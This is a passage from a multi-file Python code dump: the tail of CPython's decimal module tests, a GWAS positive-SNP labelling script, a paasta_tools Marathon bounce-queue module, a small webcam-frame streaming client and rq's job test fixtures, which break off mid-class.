'normalize', 'number_class', 'sqrt', 'to_eng_string']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
for attr in ['compare', 'compare_signal', 'logical_and',
'logical_or', 'max', 'max_mag', 'min', 'min_mag',
'remainder_near', 'rotate', 'scaleb', 'shift']:
func = getattr(x, attr)
self.assertRaises(TypeError, func, context="x")
self.assertRaises(TypeError, func, "x", context=None)
self.assertRaises(TypeError, x.to_integral, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral, [], [])
self.assertRaises(TypeError, x.to_integral_value, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_value, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_value, [], [])
self.assertRaises(TypeError, x.to_integral_exact, rounding=None, context=[])
self.assertRaises(TypeError, x.to_integral_exact, rounding={}, context=[])
self.assertRaises(TypeError, x.to_integral_exact, [], [])
self.assertRaises(TypeError, x.fma, 1, 2, context="x")
self.assertRaises(TypeError, x.fma, 1, 2, "x", context=None)
self.assertRaises(TypeError, x.quantize, 1, [], context=None)
self.assertRaises(TypeError, x.quantize, 1, [], rounding=None)
self.assertRaises(TypeError, x.quantize, 1, [], [])
c = Context()
self.assertRaises(TypeError, c.power, 1, 2, mod="x")
self.assertRaises(TypeError, c.power, 1, "x", mod=None)
self.assertRaises(TypeError, c.power, "x", 2, mod=None)
@requires_extra_functionality
def test_c_context_templates(self):
self.assertEqual(
C.BasicContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow|
C.DecUnderflow|C.DecClamped
)
self.assertEqual(
C.DefaultContext._traps,
C.DecIEEEInvalidOperation|C.DecDivisionByZero|C.DecOverflow
)
@requires_extra_functionality
def test_c_signal_dict(self):
# SignalDict coverage
Context = C.Context
DefaultContext = C.DefaultContext
InvalidOperation = C.InvalidOperation
FloatOperation = C.FloatOperation
DivisionByZero = C.DivisionByZero
Overflow = C.Overflow
Subnormal = C.Subnormal
Underflow = C.Underflow
Rounded = C.Rounded
Inexact = C.Inexact
Clamped = C.Clamped
DecClamped = C.DecClamped
DecInvalidOperation = C.DecInvalidOperation
DecIEEEInvalidOperation = C.DecIEEEInvalidOperation
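# Assert that 'signal' is the only entry in signal_dict that is set.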
def assertIsExclusivelySet(signal, signal_dict):
for sig in signal_dict:
if sig == signal:
self.assertTrue(signal_dict[sig])
else:
self.assertFalse(signal_dict[sig])
c = DefaultContext.copy()
# Signal dict methods
self.assertTrue(Overflow in c.traps)
c.clear_traps()
for k in c.traps.keys():
c.traps[k] = True
for v in c.traps.values():
self.assertTrue(v)
c.clear_traps()
for k, v in c.traps.items():
self.assertFalse(v)
self.assertFalse(c.flags.get(Overflow))
self.assertIs(c.flags.get("x"), None)
self.assertEqual(c.flags.get("x", "y"), "y")
self.assertRaises(TypeError, c.flags.get, "x", "y", "z")
self.assertEqual(len(c.flags), len(c.traps))
s = sys.getsizeof(c.flags)
s = sys.getsizeof(c.traps)
s = c.flags.__repr__()
# Set flags/traps.
c.clear_flags()
c._flags = DecClamped
self.assertTrue(c.flags[Clamped])
c.clear_traps()
c._traps = DecInvalidOperation
self.assertTrue(c.traps[InvalidOperation])
# Set flags/traps from dictionary.
c.clear_flags()
d = c.flags.copy()
d[DivisionByZero] = True
c.flags = d
assertIsExclusivelySet(DivisionByZero, c.flags)
c.clear_traps()
d = c.traps.copy()
d[Underflow] = True
c.traps = d
assertIsExclusivelySet(Underflow, c.traps)
# Random constructors
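# Expected mapping from Python signal classes to libmpdec condition flags.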
IntSignals = {
Clamped: C.DecClamped,
Rounded: C.DecRounded,
Inexact: C.DecInexact,
Subnormal: C.DecSubnormal,
Underflow: C.DecUnderflow,
Overflow: C.DecOverflow,
DivisionByZero: C.DecDivisionByZero,
FloatOperation: C.DecFloatOperation,
InvalidOperation: C.DecIEEEInvalidOperation
}
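# Conditions that all collapse into InvalidOperation at the Python level.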
IntCond = [
C.DecDivisionImpossible, C.DecDivisionUndefined, C.DecFpuError,
C.DecInvalidContext, C.DecInvalidOperation, C.DecMallocError,
C.DecConversionSyntax,
]
lim = len(OrderedSignals[C])
for r in range(lim):
for t in range(lim):
for round in RoundingModes:
flags = random.sample(OrderedSignals[C], r)
traps = random.sample(OrderedSignals[C], t)
prec = random.randrange(1, 10000)
emin = random.randrange(-10000, 0)
emax = random.randrange(0, 10000)
clamp = random.randrange(0, 2)
caps = random.randrange(0, 2)
cr = random.randrange(0, 2)
c = Context(prec=prec, rounding=round, Emin=emin, Emax=emax,
capitals=caps, clamp=clamp, flags=list(flags),
traps=list(traps))
self.assertEqual(c.prec, prec)
self.assertEqual(c.rounding, round)
self.assertEqual(c.Emin, emin)
self.assertEqual(c.Emax, emax)
self.assertEqual(c.capitals, caps)
self.assertEqual(c.clamp, clamp)
f = 0
for x in flags:
f |= IntSignals[x]
self.assertEqual(c._flags, f)
f = 0
for x in traps:
f |= IntSignals[x]
self.assertEqual(c._traps, f)
for cond in IntCond:
c._flags = cond
self.assertTrue(c._flags&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.flags)
for cond in IntCond:
c._traps = cond
self.assertTrue(c._traps&DecIEEEInvalidOperation)
assertIsExclusivelySet(InvalidOperation, c.traps)
def test_invalid_override(self):
Decimal = C.Decimal
try:
from locale import CHAR_MAX
except ImportError:
self.skipTest('locale.CHAR_MAX not available')
def make_grouping(lst):
return ''.join([chr(x) for x in lst])
def get_fmt(x, override=None, fmt='n'):
return Decimal(x).__format__(fmt, override)
invalid_grouping = {
'decimal_point' : ',',
'grouping' : make_grouping([255, 255, 0]),
'thousands_sep' : ','
}
invalid_dot = {
'decimal_point' : 'xxxxx',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : ','
}
invalid_sep = {
'decimal_point' : '.',
'grouping' : make_grouping([3, 3, 0]),
'thousands_sep' : 'yyyyy'
}
if CHAR_MAX == 127: # negative grouping in override
self.assertRaises(ValueError, get_fmt, 12345,
invalid_grouping, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_dot, 'g')
self.assertRaises(ValueError, get_fmt, 12345, invalid_sep, 'g')
def test_exact_conversion(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
with localcontext() as c:
c.traps[InvalidOperation] = True
# Clamped
x = "0e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
x = "0e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
# Overflow
x = "1e%d" % sys.maxsize
self.assertRaises(InvalidOperation, Decimal, x)
# Underflow
x = "1e%d" % (-sys.maxsize-1)
self.assertRaises(InvalidOperation, Decimal, x)
def test_from_tuple(self):
Decimal = C.Decimal
localcontext = C.localcontext
InvalidOperation = C.InvalidOperation
Overflow = C.Overflow
Underflow = C.Underflow
with localcontext() as c:
c.prec = 9
c.traps[InvalidOperation] = True
c.traps[Overflow] = True
c.traps[Underflow] = True
# SSIZE_MAX
x = (1, (), sys.maxsize)
self.assertEqual(str(c.create_decimal(x)), '-0E+999999')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), sys.maxsize)
self.assertRaises(Overflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# SSIZE_MIN
x = (1, (), -sys.maxsize-1)
self.assertEqual(str(c.create_decimal(x)), '-0E-1000007')
self.assertRaises(InvalidOperation, Decimal, x)
x = (1, (0, 1, 2), -sys.maxsize-1)
self.assertRaises(Underflow, c.create_decimal, x)
self.assertRaises(InvalidOperation, Decimal, x)
# OverflowError
x = (1, (), sys.maxsize+1)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
x = (1, (), -sys.maxsize-2)
self.assertRaises(OverflowError, c.create_decimal, x)
self.assertRaises(OverflowError, Decimal, x)
# Specials
x = (1, (), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0,), "N")
self.assertEqual(str(Decimal(x)), '-sNaN')
x = (1, (0, 1), "N")
self.assertEqual(str(Decimal(x)), '-sNaN1')
def test_sizeof(self):
Decimal = C.Decimal
HAVE_CONFIG_64 = (C.MAX_PREC > 425000000)
self.assertGreater(Decimal(0).__sizeof__(), 0)
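# Each additional coefficient word holds 19 digits (64-bit build) or
# 9 digits (32-bit build) and costs 8 or 4 bytes respectively.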
if HAVE_CONFIG_64:
x = Decimal(10**(19*24)).__sizeof__()
y = Decimal(10**(19*25)).__sizeof__()
self.assertEqual(y, x+8)
else:
x = Decimal(10**(9*24)).__sizeof__()
y = Decimal(10**(9*25)).__sizeof__()
self.assertEqual(y, x+4)
def test_internal_use_of_overridden_methods(self):
Decimal = C.Decimal
# Unsound subtyping
class X(float):
def as_integer_ratio(self):
return 1
def __abs__(self):
return self
class Y(float):
def __abs__(self):
return [1]*200
class I(int):
def bit_length(self):
return [1]*200
class Z(float):
def as_integer_ratio(self):
return (I(1), I(1))
def __abs__(self):
return self
for cls in X, Y, Z:
self.assertEqual(Decimal.from_float(cls(101.1)),
Decimal.from_float(101.1))
# Issue 41540:
@unittest.skipIf(sys.platform.startswith("aix"),
"AIX: default ulimit: test is flaky because of extreme over-allocation")
@unittest.skipIf(check_sanitizer(address=True, memory=True),
"ASAN/MSAN sanitizer defaults to crashing "
"instead of returning NULL for malloc failure.")
def test_maxcontext_exact_arith(self):
# Make sure that exact operations do not raise MemoryError due
# to huge intermediate values when the context precision is very
# large.
# The following functions fill the available precision and are
# therefore not suitable for large precisions (by design of the
# specification).
MaxContextSkip = ['logical_invert', 'next_minus', 'next_plus',
'logical_and', 'logical_or', 'logical_xor',
'next_toward', 'rotate', 'shift']
Decimal = C.Decimal
Context = C.Context
localcontext = C.localcontext
# Here only some functions that are likely candidates for triggering a
# MemoryError are tested. deccheck.py has an exhaustive test.
maxcontext = Context(prec=C.MAX_PREC, Emin=C.MIN_EMIN, Emax=C.MAX_EMAX)
with localcontext(maxcontext):
self.assertEqual(Decimal(0).exp(), 1)
self.assertEqual(Decimal(1).ln(), 0)
self.assertEqual(Decimal(1).log10(), 0)
self.assertEqual(Decimal(10**2).log10(), 2)
self.assertEqual(Decimal(10**223).log10(), 223)
self.assertEqual(Decimal(10**19).logb(), 19)
self.assertEqual(Decimal(4).sqrt(), 2)
self.assertEqual(Decimal("40E9").sqrt(), Decimal('2.0E+5'))
self.assertEqual(divmod(Decimal(10), 3), (3, 1))
self.assertEqual(Decimal(10) // 3, 3)
self.assertEqual(Decimal(4) / 2, 2)
self.assertEqual(Decimal(400) ** -1, Decimal('0.0025'))
@requires_docstrings
@unittest.skipUnless(C, "test requires C version")
class SignatureTest(unittest.TestCase):
"""Function signatures"""
def test_inspect_module(self):
for attr in dir(P):
if attr.startswith('_'):
continue
p_func = getattr(P, attr)
c_func = getattr(C, attr)
if (attr == 'Decimal' or attr == 'Context' or
inspect.isfunction(p_func)):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
c_names = list(c_sig.parameters.keys())
p_names = [x for x in p_sig.parameters.keys() if not
x.startswith('_')]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch in %s" % p_func)
c_kind = [x.kind for x in c_sig.parameters.values()]
p_kind = [x[1].kind for x in p_sig.parameters.items() if not
x[0].startswith('_')]
# parameters:
if attr != 'setcontext':
self.assertEqual(c_kind, p_kind,
msg="parameter kind mismatch in %s" % p_func)
def test_inspect_types(self):
POS = inspect._ParameterKind.POSITIONAL_ONLY
POS_KWD = inspect._ParameterKind.POSITIONAL_OR_KEYWORD
# Type heuristic (type annotations would help!):
pdict = {C: {'other': C.Decimal(1),
'third': C.Decimal(1),
'x': C.Decimal(1),
'y': C.Decimal(1),
'z': C.Decimal(1),
'a': C.Decimal(1),
'b': C.Decimal(1),
'c': C.Decimal(1),
'exp': C.Decimal(1),
'modulo': C.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': C.ROUND_HALF_UP,
'context': C.getcontext()},
P: {'other': P.Decimal(1),
'third': P.Decimal(1),
'a': P.Decimal(1),
'b': P.Decimal(1),
'c': P.Decimal(1),
'exp': P.Decimal(1),
'modulo': P.Decimal(1),
'num': "1",
'f': 1.0,
'rounding': P.ROUND_HALF_UP,
'context': P.getcontext()}}
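# Build the positional and keyword arguments for a signature, taking
# dummy values of the appropriate type from pdict.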
def mkargs(module, sig):
args = []
kwargs = {}
for name, param in sig.parameters.items():
if name == 'self': continue
if param.kind == POS:
args.append(pdict[module][name])
elif param.kind == POS_KWD:
kwargs[name] = pdict[module][name]
else:
raise TestFailed("unexpected parameter kind")
return args, kwargs
def tr(s):
"""The C Context docstrings use 'x' in order to prevent confusion
with the article 'a' in the descriptions."""
if s == 'x': return 'a'
if s == 'y': return 'b'
if s == 'z': return 'c'
return s
def doit(ty):
p_type = getattr(P, ty)
c_type = getattr(C, ty)
for attr in dir(p_type):
if attr.startswith('_'):
continue
p_func = getattr(p_type, attr)
c_func = getattr(c_type, attr)
if inspect.isfunction(p_func):
p_sig = inspect.signature(p_func)
c_sig = inspect.signature(c_func)
# parameter names:
p_names = list(p_sig.parameters.keys())
c_names = [tr(x) for x in c_sig.parameters.keys()]
self.assertEqual(c_names, p_names,
msg="parameter name mismatch in %s" % p_func)
p_kind = [x.kind for x in p_sig.parameters.values()]
c_kind = [x.kind for x in c_sig.parameters.values()]
# 'self' parameter:
self.assertIs(p_kind[0], POS_KWD)
self.assertIs(c_kind[0], POS)
# remaining parameters:
if ty == 'Decimal':
self.assertEqual(c_kind[1:], p_kind[1:],
msg="parameter kind mismatch in %s" % p_func)
else: # Context methods are positional only in the C version.
self.assertEqual(len(c_kind), len(p_kind),
msg="parameter kind mismatch in %s" % p_func)
# Run the function:
args, kwds = mkargs(C, c_sig)
try:
getattr(c_type(9), attr)(*args, **kwds)
except Exception:
raise TestFailed("invalid signature for %s: %s %s" % (c_func, args, kwds))
args, kwds = mkargs(P, p_sig)
try:
getattr(p_type(9), attr)(*args, **kwds)
except Exception:
raise TestFailed("invalid signature for %s: %s %s" % (p_func, args, kwds))
doit('Decimal')
doit('Context')
all_tests = [
CExplicitConstructionTest, PyExplicitConstructionTest,
CImplicitConstructionTest, PyImplicitConstructionTest,
CFormatTest, PyFormatTest,
CArithmeticOperatorsTest, PyArithmeticOperatorsTest,
CThreadingTest, PyThreadingTest,
CUsabilityTest, PyUsabilityTest,
CPythonAPItests, PyPythonAPItests,
CContextAPItests, PyContextAPItests,
CContextWithStatement, PyContextWithStatement,
CContextFlags, PyContextFlags,
CSpecialContexts, PySpecialContexts,
CContextInputValidation, PyContextInputValidation,
CContextSubclassing, PyContextSubclassing,
CCoverage, PyCoverage,
CFunctionality, PyFunctionality,
CWhitebox, PyWhitebox,
CIBMTestCases, PyIBMTestCases,
]
# Delete C tests if _decimal.so is not present.
if not C:
all_tests = all_tests[1::2]
else:
all_tests.insert(0, CheckAttributes)
all_tests.insert(1, SignatureTest)
def test_main(arith=None, verbose=None, todo_tests=None, debug=None):
""" Execute the tests.
Runs all arithmetic tests if arith is True or if the "decimal" resource
is enabled in regrtest.py
"""
init(C)
init(P)
global TEST_ALL, DEBUG
TEST_ALL = arith if arith is not None else is_resource_enabled('decimal')
DEBUG = debug
if todo_tests is None:
test_classes = all_tests
else:
test_classes = [CIBMTestCases, PyIBMTestCases]
# Dynamically build custom test definition for each file in the test
# directory and add the definitions to the DecimalTest class. This
    # procedure ensures that new files do not get skipped.
for filename in os.listdir(directory):
if '.decTest' not in filename or filename.startswith("."):
continue
head, tail = filename.split('.')
if todo_tests is not None and head not in todo_tests:
continue
tester = lambda self, f=filename: self.eval_file(directory + f)
setattr(CIBMTestCases, 'test_' + head, tester)
setattr(PyIBMTestCases, 'test_' + head, tester)
del filename, head, tail, tester
try:
run_unittest(*test_classes)
if todo_tests is None:
from doctest import IGNORE_EXCEPTION_DETAIL
savedecimal = sys.modules['decimal']
if C:
sys.modules['decimal'] = C
run_doctest(C, verbose, optionflags=IGNORE_EXCEPTION_DETAIL)
sys.modules['decimal'] = P
run_doctest(P, verbose)
sys.modules['decimal'] = savedecimal
finally:
if C: C.setcontext(ORIGINAL_CONTEXT[C])
P.setcontext(ORIGINAL_CONTEXT[P])
if not C:
warnings.warn('C tests skipped: no module named _decimal.',
UserWarning)
if not orig_sys_decimal is sys.modules['decimal']:
raise TestFailed("Internal error: unbalanced number of changes to "
"sys.modules['decimal'].")
if __name__ == '__main__':
import optparse
p = optparse.OptionParser("test_decimal.py [--debug] [{--skip | test1 [test2 [...]]}]")
p.add_option('--debug', '-d', action='store_true', help='shows the test number and context before each test')
p.add_option('--skip', '-s', action='store_true', help='skip over 90% of the arithmetic tests')
(opt, args) = p.parse_args()
if opt.skip:
test_main(arith=False, verbose=True)
elif args:
test_main(arith=True, verbose=True, todo_tests=args, debug=opt.debug)
else:
test_main(arith=True, verbose=True)
|
positive.py
|
import numpy as np
import pandas as pd
import multiprocessing as mp
from tqdm import tqdm
class positive():
__chrom_set = ["chr"+str(i) for i in range(1, 23)] + ["chrX", "chrY"]
def __init__(self, filename="grasp_sub_w_annot.txt"):
self.cores = mp.cpu_count()
self.grasp_w_annotation = pd.read_csv(filename, sep="\t")
def generate_positive(self, grasp_groups, window_size):
for name, group in tqdm(grasp_groups, total=len(grasp_groups)):
group["positive"] = None
# protein-coding SNPs are NOT positive
group.loc[group["annotation"]=="pcexon", "positive"] = False
df_pcexon = group[(group["annotation"]=="pcexon") & (group["Pvalue"] < 5e-8)] # associated pcexon
for chromStart_pcexon, pmid, phenotype in zip(df_pcexon["pos"], df_pcexon["PMID"], df_pcexon["Phenotype"]):
group.loc[(group["pos"] >= chromStart_pcexon - window_size/2) & \
(group["pos"] <= chromStart_pcexon + window_size/2) & \
(group["PMID"] == pmid) & \
(group["Phenotype"] == phenotype), "positive"] = False
for ind, row in group.iterrows():
if row["positive"] == True:
continue
if row["positive"] == False:
continue
id_locus = group.loc[(group["pos"] >= row["pos"] - window_size/2) & \
(group["pos"] <= row["pos"] + window_size/2) & \
(group["annotation"] != "pcexon")]["ID"]
min_pvalue = group.loc[group["ID"].isin(id_locus), "Pvalue"].min()
id_min_pvalue = group.loc[group["Pvalue"]==min_pvalue, "ID"]
group.loc[group["ID"].isin(id_locus), "positive"] = False
group.loc[(group["ID"].isin(id_min_pvalue)) & \
(group["annotation"]!="pcexon"), "positive"] = True
self.positive_list.append(group)
# parallel computing of positive cases
def fast_generate_positive(self, window_size):
self.manager = mp.Manager()
self.positive_list = self.manager.list()
processes = []
groups = self.grasp_w_annotation.groupby(["chr", "PMID", "Phenotype"])
grasp_groups_list = np.array_split(groups, self.cores)
for grasp_groups in grasp_groups_list:
p = mp.Process(target=self.generate_positive, args=(grasp_groups, window_size))
processes.append(p)
for p in processes:
p.start()
for p in processes:
p.join()
self.grasp_sub_w_annot_positive = pd.concat(self.positive_list)
self.grasp_sub_w_annot_positive.sort_values(by=['SNPid(dbSNP134)', 'ID', 'positive'], ascending=[True, True, False], inplace=True) # order according to [rsid, positive]
self.grasp_sub_w_annot_positive.drop_duplicates(subset='SNPid(dbSNP134)', keep='first', inplace=True) # keep all the TRUE if there is a TRUE (the first entry for each SNP rsid)
self.grasp_sub_w_annot_positive.reset_index(drop=True, inplace=True)
print("[INFO] generate grasp_sub_w_annot_positive!")
return self.grasp_sub_w_annot_positive
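    # Hedged usage sketch (assumes "grasp_sub_w_annot.txt" exists and has the
    # columns referenced above; the window size is illustrative):
    #   pos = positive("grasp_sub_w_annot.txt")
    #   df = pos.fast_generate_positive(window_size=10000)
    #   df[["SNPid(dbSNP134)", "positive"]].head()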
|
common.py
|
import logging
import time
from contextlib import contextmanager
from queue import Empty
from queue import PriorityQueue
from queue import Queue
from threading import Condition
from threading import Event
from threading import Thread
from typing import Any
from typing import Collection
from typing import Generator
from typing import Iterable
from typing import List
from typing import NamedTuple
from typing import Optional
from typing import Tuple
from typing_extensions import Protocol
from paasta_tools.marathon_tools import DEFAULT_SOA_DIR
from paasta_tools.marathon_tools import get_all_marathon_apps
from paasta_tools.marathon_tools import get_marathon_clients
from paasta_tools.marathon_tools import get_marathon_servers
from paasta_tools.marathon_tools import load_marathon_service_config_no_cache
from paasta_tools.marathon_tools import MarathonClients
from paasta_tools.marathon_tools import MarathonServiceConfig
from paasta_tools.metrics.metrics_lib import TimerProtocol
from paasta_tools.utils import load_system_paasta_config
class BounceTimers(NamedTuple):
processed_by_worker: TimerProtocol
setup_marathon: TimerProtocol
bounce_length: TimerProtocol
class ServiceInstance(NamedTuple):
service: str
instance: str
watcher: str
bounce_by: float
wait_until: float
enqueue_time: float
bounce_start_time: float
failures: int = 0
processed_count: int = 0
# Hack to make the default values for ServiceInstance work on python 3.6.0. (typing.NamedTuple gained default values in
# python 3.6.1.)
ServiceInstance.__new__.__defaults__ = (0, 0) # type: ignore
class PaastaThread(Thread):
@property
def log(self) -> logging.Logger:
name = ".".join([type(self).__module__, type(self).__name__])
return logging.getLogger(name)
class PaastaQueue(Queue):
def __init__(self, name: str, *args: Any, **kwargs: Any) -> None:
self.name = name
super().__init__(*args, **kwargs)
@property
def log(self) -> logging.Logger:
name = ".".join([type(self).__module__, type(self).__name__])
return logging.getLogger(name)
def put(self, item: Any, *args: Any, **kwargs: Any) -> None:
self.log.debug(f"Adding {item} to {self.name} queue")
super().put(item, *args, **kwargs)
def exponential_back_off(
failures: int, factor: float, base: float, max_time: float
) -> float:
seconds = factor * base ** failures
return seconds if seconds < max_time else max_time
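# Hedged worked example (values are illustrative, not from the original module):
# with factor=30, base=2 and max_time=7200, failure counts of 0, 1 and 4 back
# off for 30, 60 and 480 seconds respectively, and the delay is capped at
# max_time once the exponential term exceeds it.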
def get_service_instances_needing_update(
marathon_clients: MarathonClients,
instances: Collection[Tuple[str, str]],
cluster: str,
) -> List[Tuple[str, str, MarathonServiceConfig]]:
marathon_apps = {}
for marathon_client in marathon_clients.get_all_clients():
marathon_apps.update(
{app.id: app for app in get_all_marathon_apps(marathon_client)}
)
marathon_app_ids = marathon_apps.keys()
service_instances = []
for service, instance in instances:
try:
config = load_marathon_service_config_no_cache(
service=service,
instance=instance,
cluster=cluster,
soa_dir=DEFAULT_SOA_DIR,
)
config_app = config.format_marathon_app_dict()
app_id = "/{}".format(config_app["id"])
# Not ideal but we rely on a lot of user input to create the app dict
# and we really can't afford to bail if just one app definition is malformed
except Exception as e:
print(
"ERROR: Skipping {}.{} because: '{}'".format(service, instance, str(e))
)
continue
if app_id not in marathon_app_ids:
service_instances.append((service, instance, config))
elif marathon_apps[app_id].instances != config_app["instances"]:
service_instances.append((service, instance, config))
return service_instances
def get_marathon_clients_from_config() -> MarathonClients:
system_paasta_config = load_system_paasta_config()
marathon_servers = get_marathon_servers(system_paasta_config)
marathon_clients = get_marathon_clients(marathon_servers)
return marathon_clients
class DelayDeadlineQueueProtocol(Protocol):
def __init__(self) -> None:
...
def put(self, si: ServiceInstance) -> None:
...
@contextmanager
def get(
self, block: bool = True, timeout: float = None
) -> Generator[ServiceInstance, None, None]:
...
def get_available_service_instances(
self, fetch_service_instances: bool
) -> Iterable[Tuple[float, Optional[ServiceInstance]]]:
...
def get_unavailable_service_instances(
self, fetch_service_instances: bool
) -> Iterable[Tuple[float, float, Optional[ServiceInstance]]]:
...
class DelayDeadlineQueue(DelayDeadlineQueueProtocol):
"""Entries into this queue have both a wait_until and a bounce_by. Before wait_until, get() will not return an entry.
get() returns the entry whose wait_until has passed and which has the lowest bounce_by."""
def __init__(self) -> None:
self.available_service_instances: PriorityQueue[
Tuple[float, ServiceInstance]
] = PriorityQueue()
self.unavailable_service_instances: PriorityQueue[
Tuple[float, float, ServiceInstance]
] = PriorityQueue()
self.unavailable_service_instances_modify = Condition()
self.background_thread_started = Event()
Thread(target=self.move_from_unavailable_to_available, daemon=True).start()
self.background_thread_started.wait()
@property
def log(self) -> logging.Logger:
name = ".".join([type(self).__module__, type(self).__name__])
return logging.getLogger(name)
def put(self, si: ServiceInstance) -> None:
self.log.debug(
f"adding {si.service}.{si.instance} to queue with wait_until {si.wait_until} and bounce_by {si.bounce_by}"
)
with self.unavailable_service_instances_modify:
self.unavailable_service_instances.put((si.wait_until, si.bounce_by, si))
self.unavailable_service_instances_modify.notify()
def move_from_unavailable_to_available(self) -> None:
self.background_thread_started.set()
with self.unavailable_service_instances_modify:
while True:
try:
while True:
(
wait_until,
bounce_by,
si,
) = self.unavailable_service_instances.get_nowait()
if wait_until < time.time():
self.available_service_instances.put_nowait((bounce_by, si))
else:
self.unavailable_service_instances.put_nowait(
(wait_until, bounce_by, si)
)
timeout = wait_until - time.time()
break
except Empty:
timeout = None
self.unavailable_service_instances_modify.wait(timeout=timeout)
@contextmanager
def get(
self, block: bool = True, timeout: float = None
) -> Generator[ServiceInstance, None, None]:
bounce_by, si = self.available_service_instances.get(
block=block, timeout=timeout
)
try:
yield si
except Exception:
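            # Re-queue the entry; note that because the exception is caught here
            # without being re-raised, the @contextmanager protocol suppresses it
            # for the caller of get().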
self.available_service_instances.put((bounce_by, si))
def get_available_service_instances(
self, fetch_service_instances: bool
) -> Iterable[Tuple[float, Optional[ServiceInstance]]]:
return [
(bounce_by, (si if fetch_service_instances else None))
for bounce_by, si in self.available_service_instances.queue
]
def get_unavailable_service_instances(
self, fetch_service_instances: bool
) -> Iterable[Tuple[float, float, Optional[ServiceInstance]]]:
return [
(wait_until, bounce_by, (si if fetch_service_instances else None))
for wait_until, bounce_by, si in self.unavailable_service_instances.queue
]
|
__init__.py
|
import cv2
from maragi import Client
from time import time, sleep
import threading
class Microservice():
    def __init__(self, fps=1, ip='127.0.0.1', port='9999'):
        self.fps = fps
        self.client = Client(ip=ip, port=port)
        self._stop_event = threading.Event()
    def _transmit_loop(self):
        cap = cv2.VideoCapture(0)
        while not self._stop_event.is_set():
            start = time()
            ret, frame = cap.read()
            self.client.send(frame)
            elapsed = time() - start
            # Never sleep a negative amount when a frame takes longer than 1/fps.
            delay = max(0.0, 1.0 / self.fps - elapsed)
            sleep(delay)
        cap.release()
    def run(self):
        self.thread = threading.Thread(target=self._transmit_loop)
        self.thread.start()
    def stop(self):
        # threading.Thread has no stop(); signal the loop to exit and join it.
        self._stop_event.set()
        self.thread.join()
def original(self):
cap = cv2.VideoCapture(0)
while True:
start = time()
ret, frame = cap.read()
self.client.send(frame)
elapsed = time() - start
delay = 1.0 / self.fps - elapsed
sleep(delay)
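# Hedged usage sketch (assumes a maragi server listening on 127.0.0.1:9999 and
# a webcam available as device 0):
#   service = Microservice(fps=2)
#   service.run()    # stream frames from a background thread
#   ...
#   service.stop()   # signal the loop to exit and wait for the thread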
|
fixtures.py
|
# -*- coding: utf-8 -*-
"""
This file contains all jobs that are used in tests. Each of these test
fixtures has slightly different characteristics.
"""
from __future__ import (absolute_import, division, print_function,
unicode_literals)
import os
import time
import signal
import sys
import subprocess
import contextlib
from multiprocessing import Process
from redis import Redis
from rq import Connection, get_current_job, get_current_connection, Queue
from rq.decorators import job
from rq.compat import text_type
from rq.worker import HerokuWorker, Worker
def say_pid():
return os.getpid()
def say_hello(name=None):
"""A job with a single argument and a return value."""
if name is None:
name = 'Stranger'
return 'Hi there, %s!' % (name,)
def say_hello_unicode(name=None):
"""A job with a single argument and a return value."""
return text_type(say_hello(name)) # noqa
def do_nothing():
"""The best job in the world."""
pass
def raise_exc():
raise Exception('raise_exc error')
def raise_exc_mock():
return raise_exc
def div_by_zero(x):
"""Prepare for a division-by-zero exception."""
return x / 0
def some_calculation(x, y, z=1):
"""Some arbitrary calculation with three numbers. Choose z smartly if you
want a division by zero exception.
"""
return x * y / z
def rpush(key, value, append_worker_name=False, sleep=0):
"""Push a value into a list in Redis. Useful for detecting the order in
which jobs were executed."""
if sleep:
time.sleep(sleep)
if append_worker_name:
value += ':' + get_current_job().worker_name
redis = get_current_connection()
redis.rpush(key, value)
def check_dependencies_are_met():
return get_current_job().dependencies_are_met()
def create_file(path):
"""Creates a file at the given path. Actually, leaves evidence that the
job ran."""
with open(path, 'w') as f:
f.write('Just a sentinel.')
def create_file_after_timeout(path, timeout):
time.sleep(timeout)
create_file(path)
def create_file_after_timeout_and_setsid(path, timeout):
os.setsid()
create_file_after_timeout(path, timeout)
def launch_process_within_worker_and_store_pid(path, timeout):
p = subprocess.Popen(['sleep', str(timeout)])
with open(path, 'w') as f:
f.write('{}'.format(p.pid))
p.wait()
def access_self():
assert get_current_connection() is not None
assert get_current_job() is not None
def modify_self(meta):
j = get_current_job()
j.meta.update(meta)
j.save()
def modify_self_and_error(meta):
j = get_current_job()
j.meta.update(meta)
j.save()
return 1 / 0
def echo(*args, **kwargs):
return args, kwargs
class Number(object):
def __init__(self, value):
self.value = value
@classmethod
def divide(cls, x, y):
return x * y
def div(self, y):
return self.value / y
class CallableObject(object):
def __call__(self):
return u"I'm callable"
class UnicodeStringObject(object):
def __repr__(self):
        return u'é'
with Connection():
@job(queue='default')
def decorated_job(x, y):
return x + y
def black_hole(job, *exc_info):
# Don't fall through to default behaviour (moving to failed queue)
return False
def add_meta(job, *exc_info):
job.meta = {'foo': 1}
job.save()
return True
def save_key_ttl(key):
# Stores key ttl in meta
job = get_current_job()
ttl = job.connection.ttl(key)
job.meta = {'ttl': ttl}
job.save_meta()
def long_running_job(timeout=10):
time.sleep(timeout)
return 'Done sleeping...'
def run_dummy_heroku_worker(sandbox, _imminent_shutdown_delay):
"""
Run the work horse for a simplified heroku worker where perform_job just
creates two sentinel files 2 seconds apart.
:param sandbox: directory to create files in
:param _imminent_shutdown_delay: delay to use for HerokuWorker
"""
sys.stderr = open(os.path.join(sandbox, 'stderr.log'), 'w')
class TestHerokuWorker(HerokuWorker):
